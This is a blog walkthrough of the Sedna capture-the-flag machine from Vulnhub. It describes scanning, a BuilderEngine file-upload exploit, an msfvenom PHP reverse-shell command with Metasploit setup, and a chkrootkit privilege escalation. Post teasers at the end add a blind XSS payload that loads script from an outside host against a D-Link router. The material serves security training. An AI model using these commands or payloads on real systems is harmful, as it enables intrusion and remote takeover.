-

Hackfest2016: Sedna - VM Vulnhub.com


Sedna Vulnhub Machine Walkthrough

This is a vulnerable machine its created for the Hackfest 2016 CTF http://hackfest.ca/

Difficulty : Medium





Lets Start
This VM very kindly has the IP address already showing when you fire it up so I can skip the netdiscover , arp-scan and head straight to the NMAP scan to see what the VM has to offer.

Command : nmap -A 192.168.0.133
Nmap Results








I’ll make a note of all of them and (as usual) with these VM’s lets jump straight into the 80 http port and see what the website has to offer.
I’ll just run a nikto scan before heading over to the webiste, the output (if any) should make our reviewing more efficient.




Nikto findings (Interesting Results)








Cool, so it shows there’s a robots.txt file. Lets fire up firefox and take a look at the site and that robots.txt file.





Robots.txt file results








The robots file didn’t have anything useful in it. :-(
Ok so lets start looking a bit deeper into what the VM has to offer. I have seen nikto results , there is some list of directories:
192.168.0.133/files
192.168.0.133/license.txt
192.168.0.133/system
Cool check all files one by one, let’s see what the license file has to say.
Open the link [your-ip]/license.txt
Info Gathering Builder Engine (License File )









Cool 
OK, so it seems that the site uses BuilderEngine let’s see if we can get into that directory. OK so after checking the directory it does exist but I don’t have access to it. Let’s see if we can exploit the service. Heading over to exploit-db.com and searching for Builder Engine I get this.
Find Vulnerability in Exploit DB









Nice, so lets try it and see if we can upload a file.
Copy above code and replace your localhost in your Sedna machine ip.

Create HTML file









So after downloading the exploit and modifying the action attribute. I had to do a bit of Googling to find out how to get it to run, it was in front of me all the time. I just had to save it as a html file and open it in Firefox.





Open it on Firefox









Cool, it seems to have worked so far and it seems to be allowing me to upload a file that will get sent to the vulnerable directory on the web server. Let’s try and upload a standard php reverse shell.

Then I created a php reverse shell with msfvenom.
Command :
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.129 LPORT=4444 -f raw > shell.php
Created a PHP Shell








Uploaded the PHP file in below browse button.
Uploading Shell








After uploading the file I can see it has been uploaded and is sitting in the /files/ dir
Shell Uploaded Successfully









Open a metasploit and set a payload
Command :
set payload php/meterpreter/reverse_tcp
show options
Set LPORT : [ip]
exploit
Metasploit Session









Cool, OK now all thats left to do is click the file and see if I can get a shell back!! AGAIN





Click Shell.php file








After I requested the shell script, I had uploaded, I gained the reverse shell to VM.




Session Created WWOWW :)








BINGO, We’re in.

First flag was in the /var/www directory.




First Flag Found








Now it was time to escalate privileges. I had some unsuccessful exploit attempts with the kernel version. Then I looked for the /etc folder to find something to exploit to gain root access and I saw chkrootkit was installed.
Chkrootkit: chkrootkit (Check Rootkit) is a common Unix-based program intended to help system administrators check their system for known rootkits. It is a shell script using common UNIX/Linux tools like the strings and grep commands to search core system programs for signatures and for comparing a traversal of the /proc filesystem with the output of the ps (process status) command to look for discrepancies.




Find Chkrootkit








Yes! I could try this to exploit. So I background metasploit session and try to exploit a chkrootkit.
Chkrootkit Payload




 

After a while, I gained a new session with root.





Second Session created (Now Root :) )








Then I searched for flag.txt files.


@2nd Flag Found








Huge thanks for Viper for creating this VM. I really enjoyed it and feel I learnt so many new things from working through it. As always thanks to Vulnhub.com for hosting this and all the other amazing VM’s.
Hope you like it , If you have any queries … Feel free to contact me through linkedin or Twitter :)

Comments

Post a Comment

Popular posts from this blog

D-Link DIR-615 Wireless Router  -  Persistent Cross-Site Scripting

-
############################## ############################## ########################## # Exploit Title: D-Link DIR-615 Wireless Router — Persistent Cross Site Scripting # Date: 13.12.2019 # Exploit Author: Sanyam Chawla # Vendor Homepage:  http://www.dlink.co. in # Category: Hardware (Wi-fi Router) # Hardware Link:  http://www.dlink.co.in/ products/?pid=678 # Hardware Version: T1 # Firmware Version: 20.07 # Tested on: Windows 10 and Kali linux # CVE: CVE-2019–19742 ############################## ############################## ########################### Reproduction Steps:  — — — — — — — — — — — — — — —  Login to your wi-fi router gateway with admin credentials [i.e:  http://192.168.0.1 ] Go to Maintenance page and click on Admin on the left pannel. Put blind XSS Payload in to the name field — “><script src= https://ptguy.xss.ht ></ script>. This payload saved by the server and its reflected in the user page. Every refresh in the user home pag
Read more

D-Link DIR-615 Wireless Router —Vertical Privilege Escalation - CVE-2019–19743

-
Image
###################################################################################### # Exploit Title: D-Link DIR-615 — Vertical Prviliege Escalation # Date: 10.12.2019 # Exploit Author: Sanyam Chawla # Vendor Homepage: http://www.dlink.co.in # Category: Hardware (Wi-fi Router) # Hardware Link: http://www.dlink.co.in/products/?pid=678 # Hardware Version: T1 # Firmware Version: 20.07 # Tested on: Windows 10 and Kali linux # CVE: CVE-2019–19743 ####################################################################################### Reproduction Steps: Login to your wi-fi router gateway with normal user credentials [i.e: http://192.168.0.1 ] Go to the Maintenance page and click on Admin on the left panel. There is an option to create a user and by default, it shows only user accounts. Create an account with a name(i.e ptguy) and change the privileges from user to root(admin) by changing privileges id with burp suite. Privilege Escalation Post Request
Read more

OWASP Top 10 2017 — Web Application Security Risks

-
Image
What is OWASP :  The Open Web Application Security Project ( OWASP ) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software. OWASP is an organization filled with security experts from around the world who provide information about applications and the risks posed, in the most direct, neutral, and practical way. Since 2003, OWASP has been releasing the OWASP Top 10 list every three/four years. The list consists of the top biggest Web Application Security Risks according to OWASP. The list is compiled with the latest vulnerabilities, threats and attacks, as well as detection tactics and remediation. OWASP Top 10 project members create the list by analyzing the occurrence rates and the general severity of each threat facing our rapidly evolving application world. Image Source google A-1) SQL INJECTION : W HAT IS IT? Websites and apps occasionally need to run commands on the underlying database or operati
Read more